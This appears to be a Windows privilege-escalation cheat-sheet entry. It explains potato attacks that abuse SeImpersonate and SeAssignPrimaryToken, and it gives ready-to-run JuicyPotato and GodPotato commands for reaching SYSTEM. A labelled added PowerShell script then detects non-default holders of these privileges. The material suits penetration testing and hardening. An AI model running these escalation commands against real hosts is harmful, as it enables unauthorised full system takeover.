User Privileges

SeImpersonate and SeAssignPrimaryToken

These privileges allow you to escalate immediately to NT AUTHORITY\SYSTEM through "potato" attacks, which capture a privileged authentication and use it to impersonate the privileged process's token.

If you're running on an older OS, try using the classic JuicyPotato:

.\JuicyPotato.exe -l 1337 -p C:\windows\tasks\win.exe -t *

If you're working with anything reasonably modern, try using GodPotato:

.\GodPotato-NET4.exe -cmd "cmd /c whoami"
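
To see which accounts hold these two privileges on a host, the following added example (not part of the original page) parses a user-rights export and lists principals beyond the stock Windows defaults. The function name, the default-holder baseline and the sample data are assumptions made for illustration.

```powershell
# Added example: flag non-default holders of the two token privileges.
# Baseline (assumption): stock Windows assignments; adjust for your environment.
#   S-1-5-19 LOCAL SERVICE, S-1-5-20 NETWORK SERVICE,
#   S-1-5-32-544 Administrators, S-1-5-6 SERVICE
$DefaultHolders = @{
    'SeImpersonatePrivilege'        = @('S-1-5-19', 'S-1-5-20', 'S-1-5-32-544', 'S-1-5-6')
    'SeAssignPrimaryTokenPrivilege' = @('S-1-5-19', 'S-1-5-20')
}

# Hypothetical helper: returns one object per principal outside the baseline.
function Find-ExtraTokenPrivilegeHolders {
    param([Parameter(Mandatory)][string[]]$Lines)

    foreach ($line in $Lines) {
        # User-rights lines look like: SeXxxPrivilege = *SID,*SID,AccountName
        if ($line -notmatch '^\s*(Se\w+Privilege)\s*=\s*(.*)$') { continue }
        $right = $Matches[1]
        $value = $Matches[2]
        if (-not $DefaultHolders.ContainsKey($right)) { continue }

        foreach ($entry in ($value -split ',')) {
            # SIDs are prefixed with '*'; unresolved account names are not.
            $principal = $entry.Trim().TrimStart('*')
            if ($principal -and $DefaultHolders[$right] -notcontains $principal) {
                [pscustomobject]@{ Privilege = $right; Principal = $principal }
            }
        }
    }
}

# Constructed sample in the format produced by:
#   secedit /export /cfg rights.inf /areas USER_RIGHTS
# S-1-5-32-568 is IIS_IUSRS; svc_webapp is a made-up service account.
$sample = @'
[Privilege Rights]
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6,*S-1-5-32-568,svc_webapp
SeAssignPrimaryTokenPrivilege = *S-1-5-19,*S-1-5-20
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
'@ -split "`r?`n"

Find-ExtraTokenPrivilegeHolders -Lines $sample | Format-Table -AutoSize
```

On a real host, pass `Get-Content rights.inf` as `-Lines`; every principal it reports is an account whose compromise gives direct access to the escalation described above.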
